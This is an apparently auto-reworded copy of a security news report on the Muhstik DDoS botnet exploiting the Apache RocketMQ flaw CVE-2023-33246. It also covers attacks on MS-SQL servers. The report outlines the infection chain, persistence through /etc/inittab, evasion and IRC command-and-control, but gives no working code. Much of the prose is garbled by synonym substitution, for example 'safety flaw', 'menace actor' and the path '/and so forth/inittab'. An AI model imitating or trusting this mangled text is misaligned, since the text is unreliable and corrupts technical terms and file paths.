The distributed denial-of-service (DDoS) botnet often called Muhstik has been noticed leveraging a now-patched safety flaw impacting Apache RocketMQ to co-opt vulnerable servers and increase its scale.
“Muhstik is a well-known threat targeting IoT devices and Linux-based servers, notorious for its ability to infect devices and utilize them for cryptocurrency mining and launching Distributed Denial of Service (DDoS) attacks,” Cloud safety agency Aqua mentioned in a report printed this week.
First documented in 2018, assault campaigns involving the malware have a historical past of exploiting recognized safety flaws, particularly these regarding internet functions, for propagation.
The newest addition to the listing of exploited vulnerabilities is CVE-2023-33246 (CVSS rating: 9.8), a important safety flaw affecting Apache RocketMQ that enables a distant and unauthenticated attacker to carry out distant code execution by forging the RocketMQ protocol content material or utilizing the replace configuration perform.
As soon as the shortcoming is efficiently abused to acquire preliminary entry, the menace actor proceeds to execute a shell script hosted on a distant IP handle, which is then liable for retrieving the Muhstik binary (“pty3”) from one other server.
“After gaining the ability to upload the malicious payload by exploiting the RocketMQ vulnerability, the attacker is able to execute their malicious code, which downloads the Muhstik malware,” safety researcher Nitzan Yaakov mentioned.
Persistence on the host is achieved via copying the malware binary to a number of directories and enhancing the /and so forth/inittab file — which controls what processes to start out through the booting of a Linux server — to robotically restart the method.
What’s extra, the naming of the binary as “pty3” is probably going an try and masquerade as a pseudoterminal (“pty“) and evade detection. One other evasion approach is that the malware is copied to directories reminiscent of /dev/shm, /var/tmp, /run/lock, and /run through the persistence part, which permits it to be executed instantly from reminiscence and keep away from leaving traces on the system.
Muhstik comes outfitted with options to assemble system metadata, laterally transfer to different gadgets over a safe shell (SSH), and finally set up contact with a command-and-control (C2) area to obtain additional directions utilizing the Web Relay Chat (IRC) protocol.
The top purpose of the malware is to weaponize the compromised gadgets to carry out several types of flooding assaults towards targets of curiosity, successfully overwhelming their community assets and triggering a denial-of-service situation.
With 5,216 weak cases of Apache RocketMQ nonetheless uncovered to the web after greater than a yr of public disclosure of the flaw, it is important that organizations take steps to replace to the newest model in an effort to mitigate potential threats.
“Moreover, in previous campaigns, cryptomining activity was detected after the execution of the Muhstik malware,” Yaakov mentioned. “These objectives go hand in hand, as the attackers strive to spread and infect more machines, which helps them in their mission to mine more cryptocurrency using the electrical power of the compromised machines.”
The disclosure comes because the AhnLab Safety Intelligence Heart (ASEC) revealed that poorly secured MS-SQL servers are being focused by menace actors to numerous sorts of malware, starting from ransomware and distant entry trojans to Proxyware.
“Administrators must use passwords that are difficult to guess for their accounts and change them periodically to protect the database server from brute-force attacks and dictionary attacks,” ASEC mentioned. “They must also apply the latest patches to prevent vulnerability attacks.”
